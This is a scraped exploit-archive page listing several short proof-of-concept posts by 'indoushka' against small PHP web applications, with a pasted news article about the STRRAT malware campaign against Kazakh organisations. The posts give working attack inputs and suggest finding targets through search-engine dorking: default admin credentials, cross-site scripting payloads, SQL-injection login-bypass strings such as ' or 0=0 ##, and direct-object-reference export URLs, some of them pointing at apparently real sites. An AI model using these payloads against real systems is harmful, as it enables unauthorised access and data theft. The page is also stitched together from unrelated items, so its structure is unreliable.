Computer Laboratory Management System version 1.0 suffers from an ignored default credential vulnerability.

**Computer Laboratory Management System 1.0 Insecure Settings**

Posted Aug 6, 2024

Authored by indoushka

Computer Laboratory Management System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 903fb54e0bd8fb8efe43fdddb49a0f5abaa23ea96b8495e4f7c47b36636f9f0d

Download | Favorite | View

**Computer Laboratory Management System 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Computer Laboratory Management System v1.0 Insecure Settings Vulnerability                                                  || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#comment-104400      |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,255)
*   Arbitrary (16,849)
*   BBS (2,859)
*   Bypass (1,860)
*   CGI (1,033)
*   Code Execution (7,786)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,385)
*   DoS (25,039)
*   Encryption (2,389)
*   Exploit (53,128)
*   File Inclusion (4,258)
*   File Upload (990)
*   Firewall (822)
*   Info Disclosure (2,888)
*   Intrusion Detection (915)
*   Java (3,142)
*   JavaScript (896)
*   Kernel (7,188)
*   Local (14,791)
*   Magazine (586)
*   Overflow (13,166)
*   Perl (1,435)
*   PHP (5,221)
*   Proof of Concept (2,381)
*   Protocol (3,724)
*   Python (1,632)
*   Remote (31,643)
*   Root (3,633)
*   Rootkit (526)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,025)
*   Shell (3,273)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,275)
*   SQL Injection (16,604)
*   TCP (2,440)
*   Trojan (690)
*   UDP (904)
*   Virus (669)
*   Vulnerability (32,932)
*   Web (9,955)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,246)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,087)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,536)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,612)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,441)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,727)
*   UNIX (9,433)
*   UnixWare (187)
*   Windows (6,668)
*   Other

Computer Laboratory Management System 1.0 Insecure Settings

Codeprojects E-Commerce version 1.0 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : Codeprojects E-Commerce v1.0 XSS Vulnerability                                                                              || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://code-projects.org/?s=Ecommerce                                                                                      |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : admin/includes/profile_modal.php/"onmouseover%3d'prompt(938260)'bad%3d"[+] https://www/127.0.0.1/demo/comdept.cmru.ac.th/59143214/admin/includes/profile_modal.php/"onmouseover%3d'prompt(938260)'bad%3d"Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Codeprojects E-Commerce 1.0 Cross Site Scripting

Blog Site version 1.0 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : Blog Site 1.0 XSS Vulnerability                                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/blog-site-using-php_0.zip                             |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : After LOgin index.php?id=&page=http://testaspvulnweb.com/t/xss.html%3f%2500.jpg[+] Panel : http://127.0.0.1/blog/admin/index.php?id=&page=http://testasp.vulnweb.com/t/xss.html%3f%2500.jpgGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Blog Site 1.0 Cross Site Scripting 

e107 version 2.3.3 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : e107 v2.3.3 XSS Vulnerability                                                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://unlimited.dl.sourceforge.net/project/e107/e107/e107%20v2.3.3/e107_2.3.3_full.zip?viasf=1                            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /image.php?mode=main&action=dialog&for=_commonh5it1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281986%2529%253edezaw&tagid=media-cat-image&iframe=1&w=206&image=1[+] LOgin : http://127.0.0.1/233/e107_admin/[+] http://127.0.0.1/233/e107_admin/image.php?mode=main&action=dialog&for=_commonh5it1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281986%2529%253edezaw&tagid=media-cat-image&iframe=1&w=206&image=1Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

e107 2.3.3 Cross Site Scripting

Codeprojects E-Commerce version 1.0 suffers from an ignored default credential vulnerability.

    =============================================================================================================================================| # Title     : Codeprojects E-Commerce v1.0 Insecure Settings Vulnerability                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://code-projects.org/?s=Ecommerce                                                                                      |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@admin.com & pass = password[+] https://www/127.0.0.1/demo/comdeptcmru.acth/59143214/admin/products.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Codeprojects E-Commerce 1.0 Insecure Settings

Blog Site version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Blog Site 1.0 Auth By Pass Vulnerability                                                                                    || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/blog-site-using-php_0.zip                             |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] Panel : http://127.0.0.1//blog/admin/index.php?page=manage_postGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Blog Site 1.0 SQL Injection

Best Courier Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Best Courier Management System v1.0 Auth By Pass Vulnerability                                                              || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php                                     |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user : 'or''='@gmail.com & pass = 'or''='[+] Panel : http://127.0.0.1/gaatitrack/login.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Best Courier Management System 1.0 SQL Injection

Appointment Scheduler version 4.0 suffers from an insecure direct object reference vulnerability.

    =============================================================================================================================================| # Title     : Appointment Scheduler v4.0 IDOR Vulnerability                                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://auth.phpjabbers.com/download/727641/53089/d9b13cca42bb941a9f06d96f22fb7743                                          |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : Allows you as a visitor to access the control panel without permissions.[+] use payload : index.php?controller=pjAdminBookings&action=pjActionExport[+] http://127.0.0.1/AppointmentSchedulerDe/index.php?controller=pjAdminBookings&action=pjActionExportGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Appointment Scheduler 4.0 Insecure Direct Object Reference

Organizations in Kazakhstan are the target of a threat activity cluster dubbed Bloody Wolf that delivers a commodity malware called STRRAT (aka Strigoi Master).
"The program selling for as little as $80 on underground resources allows the adversaries to take control of corporate computers and hijack restricted data," cybersecurity vendor BI.ZONE said in a new analysis.
The cyber attacks employ

Network Security / Threat Intelligence

Organizations in Kazakhstan are the target of a threat activity cluster dubbed **Bloody Wolf** that delivers a commodity malware called STRRAT (aka Strigoi Master).

"The program selling for as little as $80 on underground resources allows the adversaries to take control of corporate computers and hijack restricted data," cybersecurity vendor BI.ZONE said in a new analysis.

The cyber attacks employ phishing emails as an initial access vector, impersonating the Ministry of Finance of the Republic of Kazakhstan and other agencies to trick recipients into opening PDF attachments.

The file purports to be a non-compliance notice and contains links to a malicious Java archive (JAR) file as well as an installation guide for the Java interpreter necessary for the malware to function.

In an attempt to lend legitimacy to the attack, the second link points to a web page associated with the country's government website that urges visitors to install Java in order to ensure that the portal is operational.

The STRRAT malware, hosted on a website that mimics the website of the Kazakhstan government ("egov-kz\[.\]online"), sets up persistence on the Windows host by means of a Registry modification and runs the JAR file every 30 minutes.

What's more, a copy of the JAR file is copied to the Windows startup folder to ensure that it automatically launches after a system reboot.

Subsequently, it establishes connections with a Pastebin server to exfiltrate sensitive information from the compromised machine, including details about operating system version and antivirus software installed, and account data from Google Chrome, Mozilla Firefox, Internet Explorer, Foxmail, Outlook, and Thunderbird.

It's also designed to receive additional commands from the server to download and execute more payloads, log keystrokes, run commands using cmd.exe or PowerShell, restart or shut down the system, install a proxy, and remove itself.

"Using less common file types such as JAR enables the attackers to bypass defenses," BI.ZONE said. "Employing legitimate web services such as Pastebin to communicate with the compromised system makes it possible to evade network security solutions."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Kazakh Organizations Targeted by 'Bloody Wolf' Cyber Attacks

Appointment Scheduler version 3.0 suffers from an insecure direct object reference vulnerability.

    =============================================================================================================================================| # Title     : Appointment Scheduler v3.0 IDOR Vulnerability                                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://auth.phpjabbers.com/download/727641/53089/d9b13cca42bb941a9f06d96f22fb7743                                          |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : Allows you as a visitor to access the control panel without permissions.[+] use payload : index.php?controller=pjAdminBookings&action=pjActionExport[+] http://127.0.0.1/www/ wongkit.com.hk/appointment/index.php?controller=pjAdminBookings&action=pjActionExportGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Tag

#firefox